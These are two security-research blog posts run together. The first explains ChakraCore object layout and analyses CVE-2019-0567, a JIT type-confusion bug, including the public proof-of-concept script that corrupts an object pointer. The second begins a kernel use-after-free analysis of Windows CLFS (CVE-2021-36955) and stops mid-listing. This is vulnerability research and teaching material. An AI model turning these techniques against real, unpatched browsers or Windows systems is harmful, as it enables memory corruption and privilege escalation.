The first thing that stands out to us is that this is seemingly some type of “structure”, with the first 0x8 bytes holding a pointer to the DynamicObject virtual function table (vftable). The second 0x8 bytes seem to be some pointer within the same address space we are currently executing in. After this, we can see our values 1 and 2 are located 0x8 and 0x10 bytes after the aforementioned pointer (and 0x10/0x18 bytes from the actual beginning of our “structure”). Our values also have a seemingly random 1 in them. More on this in a moment.

Recall that object a has two properties: b (set to 1) and c (set to 2). They were declared and initialized “inline”, meaning the properties were assigned a value in the same line as the object actually being instantiated (let a = {b: 1, c: 2}). Dynamic objects with inlined-properties (like in our case) are represented as follows:

Note that the property values are written to the dynamic object at an offset of 0x10.

If we compare this prototype to the values from WinDbg, we can confirm that our object is a dynamic object with inlined-properties! This means the previous seemingly “random” pointer after the vftable is actually the address of data structure known as a type in ChakraCore. type isn’t too important to us, from an exploitation perspective, other than we should be aware this address contains data about the object, such as knowing where properties are stored, the TypeId (which is an internal representation ChakraCore uses to determine if the object is a string, number, etc.), a pointer to the JavaScript library, and other information. All information can be found in the ChakraCore code base.

Secondly, let’s go back for a second and talk about why our property values have a random 1 in the upper 32-bits (001000000000001). This 1 in the upper 32-bits is used to “tag” a value in order to mark it as an integer in ChakraCore. Any value that is prepended with 00100000 is an integer in ChakraCore. How is this possible? This is because ChakraCore, and most JavaScript engines, only allow 32-bit values, excluding pointers (think of integers, floats, etc.). However, an example of an object represented via a pointer would be a string, just like in C where a string is an array of characters represented by a pointer. Another example would be declaring something like an ArrayBuffer or other JavaScript object, which would also be represented by a pointer.

Since only the lower 32-bits of a 64-bit value (since we are on a 64-bit computer) are used, the upper 32-bits (more specifically, it is really only the upper 17-bits that are used) can be leveraged for other purposes, such as this “tagging” process. Do not over think this, if it doesn’t make sense now that is perfectly okay. Just know JavaScript (in ChakraCore) uses the upper 17-bits to hold information about the data type of the object (or proerty of a dynamic object in this case), excluding types represented by pointers as we mentioned. This process is actually referred to as “NaN-boxing”, meaning the upper 17-bits of a 64-bit value (remember we are on a 64-bit system) are reserved for providing type information about a given value. Anything else that doesn’t have information stored in the upper 17-bits can be treated as a pointer.

Let’s now update our test.js to see how an object looks when inline properties aren’t used.

print("DEBUG");
let a = {};
a.b = 1;
a.c = 2;
a.d = 3;
a.e = 4;

What we will do here is restart the application in WinDbg, clear the second breakpoint (the breakpoint on chakracore!Js::DynamicTypeHandler::SetSlotUnchecked), and then let execution break on the print() operation again.

After landing on the print() breakpoint, we will now re-implement the breakpoint on chakracore!Js::DynamicTypeHandler::SetSlotUnchecked, resume execution to hit the breakpoint, examine RCX (where our dynamic object should be, if we recall from the last object we debugged), and execute the SetSlotUnchecked function to see our property values get updated.

Now, according to our debugging last time, this should be the address of our object in RCX. However, taking a look at the vftable in this case we can see it points to a GlobalObject vftable, not a DynamicObject vftable. This is indicative the breakpoint was hit, but this isn’t the object we created. We can simply just hit g in the debugger again to see if the next call will act on our object. Finding this out is simply just a matter of trial and error by looking in RCX to see if the vftable comes from DynamicObject. Another good way to identify if this is our object or not is to see if everything else in the object, outside of the vftable and type, are set to 0. This could be indicative this was newly allocated memory and isn’t filled out as a “full” dynamic object with property values set.

Pressing g again, we can see now we have found our object. Notice all of the memory outside of the vftable and type is initialized to 0, as our property values haven’t been set yet.

Here we can see a slightly different layout. Where we had the value 1 last time, in our first “inlined” property, we now see another pointer in the same address space as type. Examining this pointer, we can see the value is 0.

Let’s press g in WinDbg again to execute another call to chakracore!Js::DynamicTypeHandler::SetSlotUnchecked to see how this object looks after our first value is written (1) to the object.

Interesting! This pointer, after type (where our “inlined” dynamic object value previously was), seems to contain our first value of a.b = 1!

Let’s execute g two more times to see if our values keep getting written to this pointer.

We can clearly see our values this time around, instead of being stored directly in the object, are stored in a pointer under type. This pointer is actually the address of an array known in ChakraCore as auxSlots. auxSlots is an array that is used to hold property values of an object, starting at auxSlots[0] holding the first property value, auxSlots[1] holding the second, and so on. Here is how this looks in memory.

The main difference between this and our previous “inlined” dynamic object is that now our properties are being referenced through an array, versus directly in the object “body” itself. Notice, however, that whether a dynamic object leverages the auxSlots array or inlined-properties - both start at an offset of 0x10 within a dynamic object (the first inline property value starts at dynamic_object+0x10, and auxSlots also starts at an offset of 0x10).

The ChakraCore codebase actually has a diagram in the comments of the DynamicObject.h header file with this information.

However, we did not talk about “scenario #2” in the above image. We can see in #2 that it is also possible to have a dynamic object that not only has an auxSlots array which contain property values, but also inlined-properties set directly in the object. We will not be leveraging this for exploitation, but this is possible if an object starts out with a few inlined-properties and then later on other value(s) are added. An example would be:

let a = {b: 1, c: 2, d: 3, e: 4};
a.f = 5;

Since we declared some properties inline, and then we also declared a property value after, there would be a combination of property values stored inline and also stored in the auxSlots array. Again, we will not be leveraging this memory layout for our purposes but it has been provided in this blog post for continuity purposes and to show it is possible.

CVE-2019-0567: An Analysis of a Browser-Based Type Confusion Vulnerability

Building off of our understanding of JavaScript objects and their layout in memory, and with our exploit development environment configured, let’s now put these theories in practice.

Let’s start off by executing the following JavaScript in ch.exe. Save the following JavaScript code in a file named poc.js and run the following command: ch.exe C:\Path\to\poc.js. Please note that the following proof-of-concept code comes from the Google Project Zero issue, found here. Note that there are two proofs-of-concepts here. We will be using the latter one (PoC for InitProto).

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, 0x1234);

    print(o.a);
}

main();

As we can see from the image above, when our JavaScript code is executed, an access violation occurs! This is likely due to invalid memory being accessed. Let’s execute this script again, but this time attached to WinDbg.

Executing the script, we can see the offending instruction in regards to the access violation.

Since ChakraCore is open-sourced, we can also see the corresponding source code.

Moving on, let’s take a look at the disassembly of the crash.

We can clearly see an invalid memory address (in this case 0x1234) is being accessed. Obviously we can control this value as an attacker, as it was supplied by us in the proof-of-concept.

We can also see an array is being referenced via [rax+rcx*0x8]. We know this, as we can see in the source code an auxSlots array (which we know is an array which manages property values for a dynamic JavaScript object) is being indexed. Even if we didn’t have source code, this assembly procedure is indicative of an array index. RCX in this case would contain the base address of the array with RAX being the index into the array. Multiplying the value by the size of a 64-bit address (since we are on a 64-bit machine) allows the index to fetch a given address instead of just indexing base_address+1, base_address+2, etc.

Looking a bit earlier in the disassembly, we can see the the value in RCX, which should have been the base address of the array, comes from the value rsp+0x58.

Let’s inspect this address, under greater scrutiny.

Does this “structure prototype” look familiar? We can see a virtual function table for a DynamicObject, we see what seems to be a type pointer, and see the value of a property we provided in the poc.js script, 0x1234! Let’s cross-reference what we are seeing with what our script actually does.

First, a loop is created that will execute the opt() function 2000 times. Additionally, an object called o is created with properties a and b set (to 1 and 2, respectively). This is passed to the opt() function, along with two empty values of {}. This is done as such: opt(o, {}, {}).

    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

Secondly, the function opt() is actually executed 2000 times as opt(o, {}, {}). The below code snippet is what happens inside of the opt() function.

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

Let’s start with what happens inside the opt() function.

When opt(o, {}, {}) is executed the first argument, an object o (which is created before each function call as let o = {a: 1, b: 2};) has property b set to 1 (o.b = 1;) in the first line of opt(). After this, tmp (a function in this case) has its prototype set to whatever value was provided by proto.

In JavaScript, a prototype is a built-in property that can be assigned to a function. The purpose of it, for legitimate uses, is to provide JavaScript with a way to add new properties at a later stage, to a function, which will be shared across all instances of that function. Do not worry if this sounds confusing, we just need to know a prototype is a built-in property that can be attributed to a function. The function in this case is named tmp.

As a point of contention, executing let tmp = {__proto__: proto}; is the same as executing tmp.prototype = proto.

When opt(o, {}, {}) is executed, we are providing the function with two NULL values. Since proto, which is supplied by the caller, is set to a NULL value, the prototype property of the tmp function is set to 0. When this occurs in JavaScript, the corresponding function (tmp in this case) is created without a prototype. In essence, all opt() is doing is the following:

  1. Set o’s (provided by the caller) a and b properties
  2. b is set to 1 (it was initially 2 when the o object was created via let o = {a: 1, b: 2})
  3. A function named tmp is created, and its prototype property is set to 0, which essentially means create tmp without a prototype
  4. o.a is set to the value provided by the caller through the value parameter. Since we are executing the function as opt(o, {}, {}), the o.a property will also be 0

The above code is executed 2000 times. What this does is let the JavaScript engine know that opt() has become what is known as a “hot” function. A “hot” function is one that is recognized by JavaScript as being executed constantly (in this case, 2000 times). This instructs ChakraCore to have this function go through a process called Just-In-Time compilation (JIT), where the above JavaScript is converted from interpreted code (essentially byte code) to actually compiled as machine code, such as a C .exe binary. This is done to increase performance, as this function doesn’t have to go through the interpretation process (which is beyond the scope of this blog post) every time it is executed. We will come back to this in a few moments.

After opt() is called 2000 times (this also means opt continues to be optimized for subsequent future function calls), the following happens:

let o = {a: 1, b: 2};

opt(o, o, 0x1234);

print(o.a);

For continuity purposes, let’s also display opt() again.

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

Taking a look at the second snippet of code (not the above opt() function, but the snippet above that which calls opt() as opt(o, o, 0x1234)), we can see it starts out by declaring an object o again. Notice that object o is declared with inlined-properties. We know this will be represented in memory as a dynamic object.

After o is instantiated as a dynamic object with inlined-properties, it is passed to the opt() function in both the o and proto parameters. Additionally, a value of 0x1234 is provided.

When the function call opt(o, o, 0x1234) occurs, the o.b property is set to 1, just like last time. However, this time we are not supplying a blank prototype property, but we are supplying the o dynamic object (with inlined-properties) as the prototype for the function tmp. This essentially sets tmp.prototype = o;, and let’s JavaScript know the prototype of the tmp function is now the dynamic object o. Additionally, the o.a property (which was previously 1 from the o object instantiation) is set to value, which is provided by us as 0x1234. Let’s talk about what this actually does.

We know that a dynamic object o was declared with inlined-properties. We also know that these types of dynamic objects are laid out in memory, as seen below.

Skipping over the prototype now, we also can see that o.a is set. o.a was a property that was present when the object was declared, and is represented in the object directly, since is was declared inline. So essentially, here is how this should look in memory.

When the object is instantiated (let o = {a: 1, b: 2}):

When o.b and o.a are updated via the opt() function (opt(o, o, 0x1234):

We can see that JavaScript just acted directly on the already inlined-values of 1 and 2 and simply just overwrote them with the values provided by opt() to update the o object. This means that when ChakraCore updates objects that are of the same type (e.g. a dynamic object with inlined-properties), it does so without needing to change the type in memory and just directly acts on the property values within the object.

Before moving on, let’s quickly recall a snippet of code from the JavaScript dynamic object analysis section.

let a = {b: 1, c: 2, d: 3, e: 4};
a.f = 5;

Here a is created with many inlined-properties, meaning 1, 2, 3, and 4 are all stored directly within the a object. However, when the new property of a.f is added after the instantiation of the object a, JavaScript will convert this object to reference data via an auxSlots array, as the layout of this object has obviously changed with the introduction of a new property which was not declared inline. We can recall how this looks below.

This process is known as a type transition, where ChakraCore/Chakra will update the layout of a dynamic object, in memory, based on factors such as a dynamcic object with inlined-properties adding a new property which is not declared inline after the fact.

Now that we have been introduced to type transitions, let’s now come back to the following code in our analysis (opt() function call after the 2000 calls to opt() and o object creation)

let o = {a: 1, b: 2};

opt(o, o, 0x1234);

print(o.a);
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

We know that in the opt() function, o.a and o.b are updated as o.a = 0x1234 and o.b = 1;. We know that these properties should get updated in memory as such:

However, we didn’t talk about the let tmp = {__proto__: proto}; line.

Before, we supplied the value of tmp.prototype with a value of proto. In this case, this will perform the following:

tmp.prototype = o

This may seem very innocent at first, but this is actually where our vulnerability occurs. When a function has its prototype set (e.g. tmp.prototype = o) the object which will become the prototype (in this case, our object o, since it is assigned to tmp’s prototype property) has to first go through a type transition. This means that o will no longer be represented in memory with inlined-values and instead will be updated to use auxSlots to access properties for the object.

Before transition of o (o.b = 1 occurs before the type transition, so it is still updated inline):

After transition of o:

However, since opt() has gone through the JIT process, it has been turned into machine code. JavaScript interpreters normally perform various type checks before accessing a given property. These are known as guardrails. However, since opt() was marked as “hot”, it is now represented in memory as machine code, just how any other C/C++ binary is. The guardrails for typed checks are now gone. The reason they are gone is for a reason known as speculative JIT, where since the function was executed a great number of times (2000 in this case) the JavaScript engine can assume that this function call is only going to be called with the object types that have been seen thus far. In this case, since opt() has only see 2000 calls thus far as opt(o, {}, {}) it assumes that future calls will also only be called as such. However, on the 2001st call, after the function opt() has been compiled into machine code and lost the “guardrails”, we call the function as such opt(o, o, 0x1234).

The speculation that opt() is making is that o will always be represented in memory as an object with only inlined-properties. However, since the tmp function now has an actual prototype property (instead of a blank one of {}, which really is ignored by JavaScript and let’s the engine know tmp doesn’t have a prototype), we know this process performs a type transition on the object which is assigned as the prototype for the corresponding function (e.g. the prototype for tmp is now o. o must now undergo a type transition).

Since o now goes under a type transition, and opt() doesn’t consider that o could have gone through a type transition, a “type confusion” can, and does occur here. After o goes through a type transition, the o.a property is updated to 0x1234. The opt() function only knows that if it sees an o object, it should treat the properties as inline (e.g. set them directly in the object, right after the type pointer). So, since we set o.a to 0x1234 inside the opt() function, after it is “JIT’d”, opt() gladly write the value of 0x1234 to the first inlined-property (since o.a was the first property created, it is stored right under the type pointer). However, this has a devastating effect, because o is actually laid out in memory as having an auxSlots pointer, as we know.

So, when the o.a property is updated (opt() thinks the layout in memory is | vftable | type | o.a | o.b, when in reality it is | vftable | type | auxSlots |) opt() doesn’t know that o now stores properties via the auxSlots (which is stored at offset 0x10 within a dynamic object) and it writes 0x1234 to where it thinks it should go, and that is the first inlined-property (WHICH IS ALSO STORED AT offset 0x10 WITHIN A DYNAMIC OBJECT)!

opt() thinks it is updating o as such (because JIT speculation told the function o should always have inline properties):

However, since o is laid out in memory as a dynamic object with an auxSlots pointer, this is actually what happens:

The result of the “type confusion” is that the auxSlots pointer was corrupted with 0x1234. This is because the first inlined-property of a dynamic object is stored at the same offset in the dynamic object as another object that uses an auxSlots array. Since “no one” told opt() that o was laid out in memory as an object with an auxSlots array, it still thinks o.a is stored inline. Because of this, it writes to dynamic_object+0x10, the location where o.a used to be stored. However, since o.a is now stored in an auxSlots array, this overwrites the address of the auxSlots array with the value 0x1234.

Although this is where the vulnerability takes place, where the actual access violation takes place is in the print(o.a) statement, as seen below.

opt(o, o, 0x1234); 	// Overwrite auxSlots with the value 0x1234

print(o.a);			// Try to access o.a

The o object knows internally that it is now represented as a dynamic object that uses an auxSlots array to hold its properties, after the type transition via tmp.prototype. So, when o goes to access o.a (since the print() statement requires is) it does so via the “auxSlots” pointer. However, since the auxSlots pointer was overwritten with 0x1234, ChakraCore is attempting to dereference the memory address 0x1234 (because this is where the auxSlots pointer should be) in pursuit of o.a (since we are asking ChakraCore to retrieve said value for usage with print()).

Since ChakraCore is also open-sourced, we have access to the source code. WinDbg automatically populates the corresponding source code (which we have seen earlier). Referencing this, we can see that, in fact, ChakraCore is accessing (or attempting to) an auxSlots array.

We also know that auxSlots is a member of a dynamic object. Looking at the first parameter of the function where the access violation occurs (DynamicTypeHandler::GetSlot), we can see a variable named instance is passed in, which is of type DynamicObject. This instance is actually the address of our o object, which is also of DynamicObject. A value of index is also passed in, which is the index into the auxSlots array we want to fetch a value from. Since o.a is the first property of o, this would be at auxSlots[0]. This GetSlots function, therefore, is a function that is capable of retrieving a given property of an object which stores properties via auxSlots.

Although we know now exactly how our vulnerability works, it is still worthwhile setting some breakpoints to see the exact moment where auxSlots is corrupted. Let’s update our poc.js script with a print() debug statement.

function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    // Adding a debug print statement
    print("DEBUG");

    opt(o, o, 0x1234);

    print(o.a);
}

main();

Running the script in WinDbg, let’s first set a breakpoint on our print statement. This ensures any functions which act on a dynamic object should act on our object o.

Quickly, let’s reference the Google Project Zero original vulnerability disclosure issue here. The vulnerability description says the following:

NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.

We know here that InitProto is a function that will be executed, due to our setting of the tmp function’s .prototype property. As called out in the above snippet, this function internally invokes a method (function) called SetIsPrototype, which eventually is responsible to transitioning the type of the object used as the prototype for a function (in this case, it means o will be type-transitioned).

Knowing this, and knowing we want to see exactly where this type transition occurs, to confirm that this in fact is the case and ultimately how our vulnerability comes about, let’s set a breakpoint on this SetPrototype method within chakracore!Js::DynamicObject (since we are dealing with a dynamic object). Please note we are setting a breakpoint on SetPrototype instead of SetIsPrototype, as SetIsPrototype is eventually invoked within the call stack of SetPrototype. Calling SetPrototype eventually will call SetIsPrototype.

After hitting chakracore!Js::DynamicObject::SetPrototype, we can see that our o object, pre-type transition, is currently in the RDX register.

We know that we are currently executing within a function that at some point, likely as a result of an internal call within SetPrototype, will transition o from an object with inlined-properties to an object that represents its properties via auxSlots. We know that the auxSlots array is always located at offset 0x10 within a dynamic object. Since we know our object must get transitioned at some point, let’s set a hardware breakpoint to tell WinDbg to break when o+0x10 is written to at an 8 byte (1 QWORD, or 64-bit value) boundary to see exactly where the transition happens at in ChakraCore.

As we can see, WinDbg breaks within a function called chakracore!Js::DynamicTypeHandler::AdjustSlots. We can see more of this function below.

Let’s now examine the call stack to see how exactly execution arrived at this point.

Interesting! As we can see above, the InitProto function (called OP_InitProto) internally invokes a function called ChangePrototype which eventually invokes our SetPrototype function. SetPrototype, as we mentioned earlier, invokes the SetIsPrototype function referred to in the Google Project Zero issue. This function performs a chain of function calls which eventually lead execution to where we are currently, AdjustSlots.

As we also know, we have access to the source code of ChakraCore. Let’s examine where we are within the source code of AdjustSlots, where our hardware breakpoint broke.

We can see object (presumably our dynamic object o) now has an auxSlots member. This value is set by the value newAuxSlots. Where does newAuxSlots come from? Taking a look a bit further up in the previous image, we can see a value called oldInlineSlots, which is an array, is assigned to the value newAuxSlots.

This is very interesting, because as we know from our object o before the type transition, this object is one with inlined-properties! This function seems to convert an object with inlined-property values to one represented via auxSlots!

Let’s quickly recall the disassembly of AdjustSlots.

Looking above, we can see that above the currently executing instruction of mov rax, qword ptr [rsp+0F0h] is an instruction of mov qword [rax+10h], rcx. Recall that an auxSlots pointer is stored at an offset of 0x10 within a dynamic object. This instruction is very indicative that our o object is within RAX and the value at 0x10 (where o.a, the first inlined-property, was stored as the first inlined-property is always stored at dynamic_object+0x10 inside an object represented in this manner). This value is assigned the current value of RCX. Let’s examine this in the debugger.

Perfect! We can see in RCX our inlined-property values of o.a and o.b! These values are stored in a pointer, 000001229cd38200, which is the value in RCX. This is actually the address of our auxSlots array that will be assigned to our object o as a result of the type-transition! We can see this as RAX currently contains our o object, which has now been transitioned to an auxSlots variant of a dynamic object! We can confirm this by examining the auxSlots array located at o+0x10! Looking at the above image, we can see that our object was transitioned from an inlined-property represented object to one with properties held in an auxSlots array!

Let’s set one more breakpoint to confirm this 100 percent by watching the value, in memory, being updated. Let’s set a breakpoint on the mov qword [rax+10h], rcx instruction, and remove all other breakpoints (except our print() debugging breakpoint). We can easily do this by removing breakpoints and leveraging the .restart command in WinDbg to restart execution of ch.exe (please note that the below image bay be low resolution. Right click on it and open it ina new tab to view it if you have trouble seeing it).

After hitting the print() breakpoint, we can simply continue execution to our intended breakpoint by executing g.

We can see that in WinDbg, we actually break a few instructions before our intended breakpoint. This is perfectly okay, and we can set another breakpoint on the mov qword [rax+10h], rcx instruction we intend to examine.

We then can hit our next breakpoint to see the state of execution flow when the mov qword [rax+10h], rcx instruction is reached.

We then can examine RAX, our o object, before and after execution of the above instruction to see that our object is updated from an inlined-represented dynamic object to one that leverages an auxSlots array!

Examining the auxSlots array, we can see our a and b properties!

Perfect! We now know our o object is updated in memory, and its layout has changed. However, opt() isn’t aware of this type change, and will still execute the o.a = value (where value is 0x1234) instruction as though o hasn’t been type transitioned. opt() still thinks o is represented in memory as a dynamic object with inlined-properties! Since we know inlined-properties are also stored at dynamic_object+0x10, opt() will execute the o.a = value instruction as if our auxSlots array doesn’t exist (because it doesn’t know it does because the JIT-compilation process told opt() not to worry about what type o is!). This means it will directly overwrite our auxSlots pointer with a value of 0x1234! Let’s see this in action.

To do this, let’s clear all breakpoints and start a brand new, fresh instance of ch.exe in WinDbg by either leveraging .restart or just closing and opening WinDbg again. After doing so, set a breakpoint on our print() debug function, ch!WScriptJsrt::EchoCallback.

Let’s now set a breakpoint on the function we know performs the type-transition on our object, bp chakracore!Js::DynamicTypeHandler::AdjustSlots.

Let’s again examine the callstack.

Notice the memory address right before our call to OP_InitProto, which we have already examined. The address below is the address of the function which initiated a call to OP_InitProto, but we can see there is no corresponding symbol. If we perform !address on this memory address, we can also see that there is no corresponding image name or usage for this address.

What we are seeing is JIT in action. This memory address is the address of our opt() function. The reason why there are no corresponding symbols to this function, is because ChakraCore optimized this function into actual machine code. We no longer have to go through any of the ChakraCore functions/APIs used to set properties, update properties, etc. ChakraCore leveraged JIT to compile this function into machine code that can directly act on memory addresses, just like C does when you do something like below:

STRUCT_NAME a;

// Set a.Member1
a.Member1 = 0x1234;

The way this is achieved in Microsoft Edge is through a process known as out-of-process JIT compilation. The Edge “JIT server” is a separate process from the actual “renderer” or “content” process, which is the process a user interfaces with. When a function is JIT-compiled, it is injected into the content process from the JIT server (we will abuse this with an Arbitrary Code Guard (ACG) bypass in the third post. Note also that the ACG bypass we will use has since been patched as of Windows 10 RS4) after it is optimized.

Let’s now examine this function by setting a breakpoint on it (please note that the below image bay be low resolution. Right click on it and open it ina new tab to view it if you have trouble seeing it)..

Notice right off the bat we see our call to OP_InitProto, which is indicative that this is our opt() function. Additionally, see the below image. There are no JavaScript operators or ChakraCore functions being used. What we see is pure machine code, as a result of JIT.

More fatally, however, we can see that the R15 register is about to be operated on, at an offset of 0x10. This is indicative R15 holds our o object. This is because o.a = value is set after the OP_InitProto call, meaning that mov qword ptr [r15+10h], r13 is our o.a = value instruction. We also know value is 0x1234, so this is the value that should be in R13.

However, this is where our vulnerability occurs, as opt() doesn’t know o has been updated from representing properties inline to an auxSlots setup. Nor does it make an effort to perform a check on o, as this process has gone through the JIT process! The vulnerability here is that there is no type check in the JIT code, thus, a type confusion occurs.

After hitting our breakpoint, we can see that opt() still treats o as an object with properties stored inlined, and it gladly overwrites the auxSlots pointer with our user supplied value of 0x1234 via the o.a = 0x1234 instruction, because opt() still thinks o.a is located at o+0x10, as ChakraCore didn’t let opt() know otherwise, nor was there a check on the type before the operation! The type confusion reaches its pinnacle here, as an adversary can overwrite the auxSlots pointer with a controlled value!

If we clear all breakpoints and enter g in WinDbg, we can clearly see ChakraCore attempts to access o.a via print(o.a). When ChakraCore goes to fetch property o.a, it does so via auxSlots because of the type transition. However, since opt() corrupted this value, ChakraCore attempts to dereference the auxSlots spot in memory, which contains a value of 0x1234. This is obviously an invalid memory address, as ChakraCore was expecting the legitimate pointer in memory and, thus, an access violation occurs.

Conclusion

As we saw in the previous analysis, JIT compilation has performance benefits, but it also has a pretty large attack surface. So much so that Microsoft has a new mode on Edge called Super Duper Secure Mode which actually disables JIT so all mitigations can be enabled.

Thus far we have seen a full analysis on how we went from POC -> access violation and why this occurred, including configuring an environment for analysis. In part two we will convert out DOS proof-of-concept into a read/write primitive, and then an exploit by gaining code execution and also bypassing CFG within ch.exe. After gaining code execution in ch.exe, to more easily show how code execution is obtained, we will be shifting our focus to a vulnerable build of Edge, where we will also have to bypass ACG in part three. I will see you all at part two!

Peace, love, and positivity :-)

Exploiting a use-after-free in Windows Common Logging File System (CLFS)

By Arav Garg

Overview

This post analyzes a use-after-free vulnerability in clfs.sys, the kernel driver that implements the Common Logging File System, a general-purpose logging service that can be used by user-space and kernel-space processes in Windows. A method to exploit this vulnerability to achieve privilege escalation in Windows is also outlined.

Along with two other similar vulnerabilities, Microsoft patched this vulnerability in September 2021 and assigned the CVEs CVE-2021-36955, CVE-2021-36963, and CVE-2021-38633 to them. In the absence of any public information separating the three CVEs, we’ve decided to use CVE-2021-36955 to refer to the vulnerability described herein.

The Preliminaries section describes CLFS structures, Code Analysis explains the vulnerability with the help of code snippets, and the Exploitation section outlines the steps that lead to a functional exploit.

Preliminaries

Common Log File System (CLFS) provides a high-performance, general-purpose log file subsystem that dedicated client applications can use and multiple clients can share to optimize log access. Any user-mode application that needs logging or recovery support can use CLFS. The following structures are taken from both the official documentation and a third-party’s unofficial documentation.

Every Base Log File is made up various records. These records are stored in sectors, which are written to in units of I/O called log blocks. These log blocks are always read and written in an atomic fashion to guarantee consistency.

Metadata Blocks

Every Base Log File is made up of various records. These records are stored in sectors, which are written to in units of I/O called log blocks. The Base Log File is composed of 6 different metadata blocks (3 of which are shadows), which are all examples of log blocks.

The three types of records that exist in such blocks are:

  • Control Record that contains info about layout, extend area and truncate area.
  • Base Record that contains symbol tables and info about the client, container and security contexts.
  • Truncate Record that contains info on every client that needs to have sectors changed as a result of a truncate operation.

Shadow Blocks

Three metadata records were defined above, yet six metadata blocks exist (and each metadata block only contains one record). This is due to shadow blocks, which are yet another technique used for consistency. Shadow blocks contain the previous copy of the metadata that was written, and by using the dump count in the record header, can be used to restore previously known good data in case of torn writes.

The following enumeration describes the six types of metadata blocks.

typedef enum _CLFS_METADATA_BLOCK_TYPE
{
    ClfsMetaBlockControl,
    ClfsMetaBlockControlShadow,
    ClfsMetaBlockGeneral,
    ClfsMetaBlockGeneralShadow,
    ClfsMetaBlockScratch,
    ClfsMetaBlockScratchShadow
} CLFS_METADATA_BLOCK_TYPE, *PCLFS_METADATA_BLOCK_TYPE;

Control Record

The Control Record is always composed of two sectors, as defined by the constant below:

const USHORT CLFS_CONTROL_BLOCK_RAW_SECTORS = 2;

The Control Record is defined by the structure CLFS_CONTROL_RECORD, which is shown below:

typedef struct _CLFS_CONTROL_RECORD
{
    CLFS_METADATA_RECORD_HEADER hdrControlRecord;
    ULONGLONG ullMagicValue;
    UCHAR Version;
    CLFS_EXTEND_STATE eExtendState;
    USHORT iExtendBlock;
    USHORT iFlushBlock;
    ULONG cNewBlockSectors;
    ULONG cExtendStartSectors;
    ULONG cExtendSectors;
    CLFS_TRUNCATE_CONTEXT cxTruncate;
    USHORT cBlocks;
    ULONG cReserved;
    CLFS_METADATA_BLOCK rgBlocks[ANYSIZE_ARRAY];
} CLFS_CONTROL_RECORD, *PCLFS_CONTROL_RECORD;

After Version, the next set of fields are all related to CLFS Log Extension. This data could potentially be non-zero in memory, but for a stable Base Log File on disk, all of these fields are expected to be zero. This does not, of course, imply the CLFS driver or code necessarily makes this assumption.

The first CLFS Log Extension field, eExtendState, identifies the current extend state for the file using the enumeration below:

typedef enum _CLFS_EXTEND_STATE
{
    ClfsExtendStateNone,
    ClfsExtendStateExtendingFsd,
    ClfsExtendStateFlushingBlock
} CLFS_EXTEND_STATE, *PCLFS_EXTEND_STATE;

The next two values iExtendBlock and iFlushBlock identify the index of the block being extended, followed by the block being flushed, the latter of which will normally be the shadow block. Next, the sector size of the new block is stored in cNewBlockSectors and the original sector size before the extend operation is stored in cExtendStartSectors. Finally, the number of sectors that were added is saved in cExtendSectors.

  • Block Context: The control record ends with the rgBlocks array, which defines the set of metadata blocks that exist in the Base Log File. Although this is expected to be 6, there could potentially exist additional metadata blocks, and so for forward support, the cBlocks field
    indicates the number of blocks in the array.

Each array entry is identified by the CLFS_METADATA_BLOCK structure, shown below:

typedef struct _CLFS_METADATA_BLOCK
{
    union
    {
        PUCHAR pbImage;
        ULONGLONG ullAlignment;
    };
    ULONG cbImage;
    ULONG cbOffset;
    CLFS_METADATA_BLOCK_TYPE eBlockType;
} CLFS_METADATA_BLOCK, *PCLFS_METADATA_BLOCK;

On disk, the cbOffset field indicates the offset, starting from the control metadata block (i.e.: the first sector in the Base Log File). Of where the metadata block can be found. The cbImage field, on the other hand, contains the size of the corresponding block, while the eBlockType
corresponds to the previously shown enumeration of possible metadata block types.

In memory, an additional field, pbImage, is used to store a pointer to the data in kernel-mode memory.

CLFS In-Memory Class

Once in memory, a CLFS Base Log File is represented by a CClfsBaseFile class, which can be further extended by a CClfsBaseFilePersisted. The definition for the former can be found in public symbols and is shown below:

struct _CClfsBaseFile
{
    ULONG m_cRef;
    PUCHAR m_pbImage;
    ULONG m_cbImage;
    PERESOURCE m_presImage;
    USHORT m_cBlocks;
    PCLFS_METADATA_BLOCK m_rgBlocks;
    PUSHORT m_rgcBlockReferences;
    CLFSHASHTBL m_symtblClient;
    CLFSHASHTBL m_symtblContainer;
    CLFSHASHTBL m_symtblSecurity;
    ULONGLONG m_cbContainer;
    ULONG m_cbRawSectorSize;
    BOOLEAN m_fGeneralBlockReferenced;
} CClfsBaseFile, *PCLFSBASEFILE;

These fields mainly represent data seen earlier, such as the size of the container, the sector size, the array of metadata blocks and their number, as well as the size of the whole Base Log File and its location in kernel mode memory. Additionally, the class is reference counted, and almost any access to any of its fields is protected by the m_presImage lock, which is an executive resource accessed in either shared or exclusive mode. Finally, each block itself is also referenced in the m_rgcBlockReferences array, noting there’s a limit of 65535 references. When the general block has been referenced at least once, the m_fGeneralBlockReferenced boolean is used to indicate the fact.

Code Analysis

All code listings show decompiled C code; source code is not available in the affected product.
Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

Opening a Log File

The CreateLogFile() function in the Win32 API can be used to open an existing log. This function triggers a call to CClfsBaseFilePersisted::OpenImage() in clfs.sys. The pseudocode of CClfsBaseFilePersisted::OpenImage() is listed below:

long __thiscall
CClfsBaseFilePersisted::OpenImage
          (CClfsBaseFilePersisted *this,_UNICODE_STRING *ExtFileName,_CLFS_FILTER_CONTEXT *ClfsFilterContext,
          unsigned_char param_3,unsigned_char *param_4)

{

[Truncated]

[1]

    Status = CClfsContainer::Open(this->CclfsContainer,ExtFileName,ClfsFilterContext,param_3,local_48);
    if ((int)Status < 0) {
LAB_fffff801226897c8:
        StatusDup = Status;
